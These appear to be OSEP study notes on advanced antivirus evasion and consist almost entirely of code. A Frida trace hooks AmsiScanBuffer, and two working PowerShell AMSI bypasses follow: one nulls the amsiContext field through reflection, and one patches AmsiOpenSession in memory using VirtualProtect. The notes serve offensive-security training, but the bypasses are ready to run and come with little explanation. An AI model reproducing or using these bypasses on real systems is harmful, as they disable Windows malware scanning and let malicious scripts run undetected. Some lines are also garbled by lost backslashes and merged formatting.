OSEP | 免杀高级-上

PS C:Usersdarwinyu> Get-Process -name powershellHandles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName-------  ------    -----      -----     ------     --  -- -----------    687      43    59428      73656       5.36  10684   1 powershell

frida-trace -p 10684 -x amsi.dll -i Amsi*

/* * Auto-generated by Frida. Please modify to match the signature of AmsiScanBuffer. * This stub is currently auto-generated from manpages when available. * * For full API reference, see: https://frida.re/docs/javascript-api/ */{  /**   * Called synchronously when about to call AmsiScanBuffer.   *   * @this {object} - Object allowing you to store state for use in onLeave.   * @param {function} log - Call this function with a string to be presented to the user.   * @param {array} args - Function arguments represented as an array of NativePointer objects.   * For example use args[0].readUtf8String() if the first argument is a pointer to a C string encoded as UTF-8.   * It is also possible to modify arguments by assigning a NativePointer object to an element of this array.   * @param {object} state - Object allowing you to keep state across function calls.   * Only one JavaScript function will execute at a time, so do not worry about race-conditions.   * However, do not use this to store function arguments across onEnter/onLeave, but instead   * use "this" which is an object for keeping state local to an invocation.   */   onEnter(log, args, state) {    log('[*] AmsiScanBuffer()');    log(' | - amsiContext: ' + args[0]);    log(' | - buffer: ' + Memory.readUtf16String(args[1]));    log(' | - length: ' + args[2]);    log(' | - contentName: ' + args[3]);    log(' | - amsiSession: ' + args[4]);    log(' | - result: ' + args[5] + 'n');    this.resultPointer = args[5];  },  /**   * Called synchronously when about to return from AmsiScanBuffer.   *   * See onEnter for details.   *   * @this {object} - Object allowing you to access state stored in onEnter.   * @param {function} log - Call this function with a string to be presented to the user.   * @param {NativePointer} retval - Return value represented as a NativePointer object.   * @param {object} state - Object allowing you to keep state across function calls.   */  onLeave(log, retval, state) {    log('[*] AmsiScanBuffer() Exit');    resultPointer = this.resultPointer;    log('| - Result value is :' + Memory.readUShort(resultPointer) + "n");  }}

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')

$a=[Ref].Assembly.GetTypes()// Try to find type: AmsiUtilsForeach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}}$c.GetFields('NonPublic,Static')$d = $c.GetFields('NonPublic,Static')// Try to find class ending with Context, say amsiContextForeach($e in $d) {if ($e.Name -like "*Context") {$f=$e}}$f.GetValue($null)$g=$f.GetValue($null)[IntPtr]$ptr=$g[Int32[]]$buf=@(0)[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context"){$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf =@(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

function LookupFunc {Param ($moduleName, $functionName)$assem = ([AppDomain]::CurrentDomain.GetAssemblies() |     Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].      Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')    $tmp=@()    $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName))}function getDelegateType {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,[Parameter(Position = 1)] [Type] $delType = [Void])$type = [AppDomain]::CurrentDomain.    DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),     [System.Reflection.Emit.AssemblyBuilderAccess]::Run).      DefineDynamicModule('InMemoryModule', $false).      DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',       [System.MulticastDelegate])  $type.    DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func).      SetImplementationFlags('Runtime, Managed')  $type.    DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).      SetImplementationFlags('Runtime, Managed')return $type.CreateType()}[IntPtr]$funcAddr = LookupFunc amsi.dll AmsiOpenSession$oldProtectionBuffer = 0$vp=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualProtect), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32].MakeByRefType()) ([Bool])))$vp.Invoke($funcAddr, 3, 0x40, [ref]$oldProtectionBuffer)$buf = [Byte[]] (0x48, 0x31, 0xC0) [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $funcAddr, 3)$vp.Invoke($funcAddr, 3, 0x20, [ref]$oldProtectionBuffer)